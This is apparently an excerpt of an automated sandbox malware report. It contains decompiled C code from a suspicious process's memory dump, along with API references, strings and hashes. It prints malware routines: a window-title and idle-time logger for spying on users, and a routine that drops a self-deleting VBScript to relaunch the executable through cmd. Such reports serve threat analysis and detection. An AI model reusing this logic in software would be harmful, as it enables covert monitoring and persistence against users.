								_t237 = E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0044A26E(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0044A26E(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0044A26E(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0044A26E(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0044A26E(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0044A26E(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0044A26E(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0044A26E(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E0044A26E(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0044A26E(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0044A26E(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0044A26E(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0044A26E(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0044A26E(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0044A26E(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0044A26E(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0044A26E(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0044A26E(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0044A26E(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E00447332(_v8);
								L0043EE85(_v8);
								L0043EE85(_v12);
								L0043EE85(_v16);
								goto L4;
							}
							L0043EE85(_t234);
							L0043EE85(_v12);
							L7:
							goto L4;
						}
						L0043EE85(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46a188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							L0043EE85( *(_t210 + 0x88));
							L0043EE85( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

0x00447430
0x00447439
0x00447440
0x00447443
0x00447446
0x0044744f
0x00447471
0x00447475
0x00447478
0x00447482
0x00447495
0x00447499
0x0044749c
0x004474a6
0x004474b8
0x0044774e
0x0044774f
0x00447751
0x00447759
0x0044775d
0x00447762
0x0044776d
0x00447779
0x00447785
0x00447791
0x00447797
0x0044779b
0x0044779d
0x0044779d
0x00000000
0x0044779b
0x004474c7
0x004474cb
0x004474ce
0x004474d8
0x004474ec
0x004474f2
0x00447507
0x0044751b
0x00447532
0x0044754c
0x00447554
0x00447566
0x0044757d
0x00447594
0x004475ae
0x004475c5
0x004475dc
0x004475f3
0x0044760d
0x00447624
0x0044763b
0x00447652
0x0044766c
0x00447683
0x0044769a
0x004476b1
0x004476cb
0x004476e7
0x00447715
0x00447728
0x00447719
0x0044771d
0x00447731
0x00000000
0x00000000
0x00447733
0x00447735
0x00447738
0x0044773a
0x0044773d
0x00447723
0x00447725
0x00447727
0x00447727
0x00447727
0x0044771d
0x00000000
0x0044772d
0x004476ed
0x004476f3
0x004476fc
0x00447705
0x00000000
0x0044770a
0x004474db
0x004474e4
0x004474ae
0x00000000
0x004474ae
0x004474a9
0x00000000
0x004474a9
0x00447484
0x00000000
0x00447459
0x00447459
0x0044745b
0x0044745e
0x0044779f
0x0044779f
0x004477a7
0x004477a9
0x004477a9
0x004477b1
0x004477b6
0x004477ba
0x004477c2
0x004477ca
0x004477d0
0x004477ba
0x004477d4
0x004477d9
0x004477df
0x00000000
0x004477df

APIs

_free.LIBCMT ref: 00447478
_free.LIBCMT ref: 0044749C
_free.LIBCMT ref: 004474A9
_free.LIBCMT ref: 004474CE
_free.LIBCMT ref: 004474DB
_free.LIBCMT ref: 004474E4
_free.LIBCMT ref: 004477C2
_free.LIBCMT ref: 004477CA

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c5f37deec73d9b5cc2a4134985582e4ef4d7709f3f145db41daa550356359588
Instruction ID: e6ea3b258e32db2a5a612ec849509408c7eabbb72dddc33eac43ea41aa3f9500
Opcode Fuzzy Hash: c5f37deec73d9b5cc2a4134985582e4ef4d7709f3f145db41daa550356359588
Instruction Fuzzy Hash: 6DC15672D45204AFEB20DBA9CC83FEE77F8AB08704F14415AFA05FB382D674994197A5

Uniqueness

Uniqueness Score: -1.00%

Function 0044E57E, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0044E57E(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0044E2E1(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00447125(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0044E24C();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0044706E(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = L0044DFFF(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0044E24C();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											L00439DDE(GetLastError());
											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00447237( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0044E45D(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0044419C(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							L00439DDE(_t270);
							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(L00439E14())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							L00439DDE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0044E24C();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(L00439E01()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(L00439E14())) = 0x18;
						goto L2;
					}
				} else {
					 *(L00439E01()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(L00439E14()));
				}
			}

0x0044e5a1
0x0044e5a5
0x0044e5a6
0x0044e5a6
0x0044e5a6
0x0044e5a8
0x0044e5ae
0x0044e5c9
0x0044e5ce
0x0044e5d1
0x0044e5d3
0x0044e5d5
0x0044e5f4
0x0044e5fb
0x0044e602
0x0044e605
0x0044e611
0x0044e614
0x0044e61c
0x0044e61d
0x0044e620
0x0044e620
0x0044e627
0x0044e629
0x0044e62c
0x0044e634
0x0044e637
0x0044e6a4
0x0044e6a5
0x0044e6ab
0x0044e6ad
0x0044e6f6
0x0044e6f9
0x0044e702
0x0044e705
0x0044e708
0x0044e70a
0x0044e70a
0x0044e70a
0x0044e6fb
0x0044e6fe
0x0044e6fe
0x0044e70f
0x0044e712
0x0044e71e
0x0044e723
0x0044e72f
0x0044e739
0x0044e73d
0x0044e747
0x0044e74a
0x0044e755
0x0044e75a
0x0044e76a
0x0044e76d
0x0044e771
0x0044e772
0x0044e778
0x0044e77d
0x0044e780
0x0044e782
0x0044e784
0x0044e789
0x0044e78c
0x0044e78e
0x0044e7b8
0x0044e7dc
0x0044e7e0
0x0044e7e4
0x0044e7e6
0x0044e7ea
0x0044e7ec
0x0044e7f6
0x0044e7f9
0x0044e800
0x0044e800
0x0044e800
0x0044e800
0x0044e7ea
0x0044e805
0x0044e811
0x0044e813
0x0044e89e
0x0044e89e
0x00000000
0x0044e819
0x0044e819
0x0044e81d
0x00000000
0x00000000
0x0044e822
0x0044e834
0x0044e83c
0x0044e83f
0x0044e840
0x0044e843
0x0044e84a
0x0044e84f
0x0044e852
0x0044e886
0x0044e890
0x0044e890
0x0044e89a
0x00000000
0x0044e89a
0x0044e85b
0x0044e874
0x0044e87b
0x0044e69e
0x00000000
0x0044e69e
0x0044e813
0x0044e790
0x00000000
0x0044e75c
0x0044e763
0x0044e766
0x0044e768
0x0044e792
0x0044e794
0x00000000
0x0044e79a
0x00000000
0x0044e768
0x0044e75a
0x0044e6b5
0x0044e6b8
0x0044e6d3
0x0044e6d8
0x0044e6de
0x0044e6e0
0x0044e6eb
0x0044e6eb
0x00000000
0x0044e6e0
0x0044e639
0x0044e640
0x0044e642
0x0044e679
0x0044e679
0x0044e683
0x0044e686
0x0044e68d
0x0044e68d
0x0044e68d
0x0044e699
0x00000000
0x0044e699
0x0044e644
0x0044e648
0x00000000
0x00000000
0x0044e64a
0x0044e659
0x0044e65e
0x0044e661
0x0044e662
0x0044e665
0x0044e665
0x0044e66c
0x0044e66e
0x0044e671
0x0044e674
0x0044e677
0x00000000
0x00000000
0x00000000
0x0044e5d7
0x0044e5dc
0x0044e5df
0x0044e5e6
0x00000000
0x0044e5e6
0x0044e5b0
0x0044e5b5
0x0044e5bb
0x0044e5bd
0x00000000
0x0044e5c2

APIs

Part of subcall function 0044E24C: CreateFileW.KERNEL32(00000000,?,?,'D,?,?,00000000,?,0044E627,00000000,0000000C), ref: 0044E269

GetLastError.KERNEL32 ref: 0044E692
__dosmaperr.LIBCMT ref: 0044E699
GetFileType.KERNEL32(00000000), ref: 0044E6A5
GetLastError.KERNEL32 ref: 0044E6AF
__dosmaperr.LIBCMT ref: 0044E6B8
CloseHandle.KERNEL32(00000000), ref: 0044E6D8
CloseHandle.KERNEL32(?), ref: 0044E822
GetLastError.KERNEL32 ref: 0044E854
__dosmaperr.LIBCMT ref: 0044E85B

Strings

H, xrefs: 0044E7E0

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 570a904e470dcb169733811e6bb4a5cd1fac92f63ba8fd777c4b99ab6db45fad
Instruction ID: 9379966339f950b9aa3d097b32b00a291e03590e13bcb8f4c88e3fc2e04714d3
Opcode Fuzzy Hash: 570a904e470dcb169733811e6bb4a5cd1fac92f63ba8fd777c4b99ab6db45fad
Instruction Fuzzy Hash: 8CA13732A101489FEF18EF69D8527AE7BA0EF06324F14015EF811DB391D7788D12C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00409197, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409197(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					L00409DEE(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E00402469();
						GetWindowTextW(_t77, L00401ECB( &_v100), _t57);
						_t112 = 0x46dcf4;
						if(L00409EAE(0x46dcf4) == 0) {
							L00409DD4(0x46dcf4,  &_v100);
							E00407341(E00402469() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x46c39b;
							if( *0x46c39b == 0) {
								_t112 = L00409E6B( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E00403086(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								L00408B82(_t119);
								L00401ED0();
							} else {
								E00407352(_t77, _t127, 0x46dcf4, _t136,  &_v108);
								E00409636(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					L00409C17(_t119);
					if(L00416B2E(_t119) < 0xea60) {
						L18:
						L00401ED0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = L00416B2E(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0043A6FF(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E0040530D(_t77,  &_v80, E004075C4(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402064(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								L00416C32(_t127, _t50);
								L00408B82(_t119);
								L00401FA7();
								L00401FA7();
								L00401FA7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						L00401ED0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}

0x00409197
0x0040919d
0x004091a0
0x004091a1
0x004091a3
0x004091a5
0x00409204
0x00409210
0x00409213
0x0040921d
0x00409225
0x0040922c
0x00409236
0x00409247
0x0040924d
0x0040925d
0x00409269
0x0040927d
0x00409282
0x00409289
0x00409290
0x004092ba
0x004092be
0x004092c6
0x004092cf
0x00409292
0x00409295
0x0040929c
0x0040929c
0x00409290
0x0040925d
0x004092d4
0x004092d6
0x004092e7
0x0040938f
0x00409393
0x00000000
0x004092ed
0x004092ed
0x004092f1
0x00409301
0x00409308
0x00409328
0x0040932b
0x0040935c
0x00409361
0x00409364
0x00409368
0x0040936f
0x00409378
0x00409381
0x0040938a
0x00000000
0x0040938a
0x0040930a
0x00409311
0x00409315
0x00409315
0x004093a1
0x00000000
0x004093a1
0x004092e7
0x004093a8
0x004093ae

APIs

__Init_thread_footer.LIBCMT ref: 004091F9
Sleep.KERNEL32(000001F4), ref: 00409204
GetForegroundWindow.USER32 ref: 0040920A
GetWindowTextLengthW.USER32(00000000), ref: 00409213
GetWindowTextW.USER32 ref: 00409247
Sleep.KERNEL32(000003E8), ref: 00409315

Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B

Part of subcall function 00408B82: SetEvent.KERNEL32(?,?,?,?,00409CFE,?,?,?,?,?,00000000), ref: 00408BAF

Strings

minutes }, xrefs: 0040933B
[ , xrefs: 004092AF
{ User has been idle for , xrefs: 00409347
], xrefs: 004092A9

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
String ID: [ ${ User has been idle for $ ]$ minutes }
API String ID: 107669343-3343415809
Opcode ID: f2dcb7f0f9e03a80264e01ff883b665a4e26a1f6c2b6a80bc9aa13d934397441
Instruction ID: d658e1a33bd020368734ed71537e8d6ac9b7a6128b86f83b49787c6d35493bb7
Opcode Fuzzy Hash: f2dcb7f0f9e03a80264e01ff883b665a4e26a1f6c2b6a80bc9aa13d934397441
Instruction Fuzzy Hash: 6651D471A083415BC714FB22C846A6E7795AF84308F44053FF886A62E3EF7C9E45C68B

Uniqueness

Uniqueness Score: -1.00%

Function 0040B80B, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B80B(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				L0040FB4B();
				_t36 = E00402469();
				_t37 = L00401F75(0x46c560);
				_t40 = E00410420(L00401F75(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E00403086(_t79,  &_v124, L00416C32( &_v52, E004169EB( &_v76)), 0, _t140, L".vbs");
				L00401ED0();
				L00401FA7();
				E00404409(_t79,  &_v100, E00403086(_t79,  &_v76, E0040425F(_t79,  &_v52, E0043918F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				L00401ED0();
				L00401ED0();
				L00401F4D(_t79,  &_v28);
				_t54 = E0040425F(_t79,  &_v196, L"\"\"\", 0");
				E004032F1(E00403086(_t79,  &_v76, E00403010( &_v52, E00403086(_t79,  &_v148, E0040425F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				E0040766E(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = L00401ECB( &_v100);
				_t68 = E00402469();
				if(E0041729F(L00401ECB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", L00401ECB( &_v100),  &E0045F714,  &E0045F714, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401ED0();
				L00401ED0();
				return L00401ED0();
			}

0x0040b80b
0x0040b816
0x0040b822
0x0040b82a
0x0040b84e
0x0040b858
0x0040b85a
0x0040b865
0x0040b865
0x0040b887
0x0040b890
0x0040b898
0x0040b8ca
0x0040b8d3
0x0040b8db
0x0040b8e3
0x0040b8f8
0x0040b93d
0x0040b945
0x0040b94d
0x0040b958
0x0040b963
0x0040b96e
0x0040b97b
0x0040b984
0x0040b98d
0x0040b9ab
0x0040b9d0
0x0040b9d0
0x0040b9d9
0x0040b9e1
0x0040b9f3

APIs

Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,0046C500,0040D57C), ref: 0040FB5B
Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF), ref: 0040FB6E

Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 0041043C
Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410455
Part of subcall function 00410420: RegCloseKey.KERNEL32(00000000), ref: 00410460

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B865
ShellExecuteW.SHELL32(00000000,open,00000000,Function_0005F714,Function_0005F714,00000000), ref: 0040B9C4
ExitProcess.KERNEL32 ref: 0040B9D0

Strings

CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B905
""", 0, xrefs: 0040B8ED
exepath, xrefs: 0040B83D
open, xrefs: 0040B9BE
.vbs, xrefs: 0040B86B
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040B973
Temp, xrefs: 0040B8A6

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: 9556f2529f67ce67260a5bd47da26fb020bf5f4c4e312cc61f62dce6768a0812
Instruction ID: e165f019403b777232d5c6ec79ea45895c0ef20fb9be7ec1ee46aed41850c1d8
Opcode Fuzzy Hash: 9556f2529f67ce67260a5bd47da26fb020bf5f4c4e312cc61f62dce6768a0812
Instruction Fuzzy Hash: 67418F319100185ACB14FB62DC96DEE7739AF50744F10017FF406B20E2EF385E8ACA99

Uniqueness

Uniqueness Score: -1.00%

Function 0044F2E4, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044FEEF), ref: 0044F307

Strings

log, xrefs: 0044F3AD, 0044F3B9
pow, xrefs: 0044F3EB, 0044F497, 0044F4AA
log10, xrefs: 0044F351, 0044F3A1
exp, xrefs: 0044F3CC, 0044F42E
@, xrefs: 0044F37D, 0044F417, 0044F4CF
acos, xrefs: 0044F47F
sqrt, xrefs: 0044F48B
asin, xrefs: 0044F473

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt$@
API String ID: 3527080286-3098891844
Opcode ID: 25d4c4fb5396df06a59eaed18cd1818291f52f14eaa6c0010c1140202449b6ed
Instruction ID: c22834c9641bea404e8976183de0de3b5e68054bdcba2795ef1ced98d83d77b1
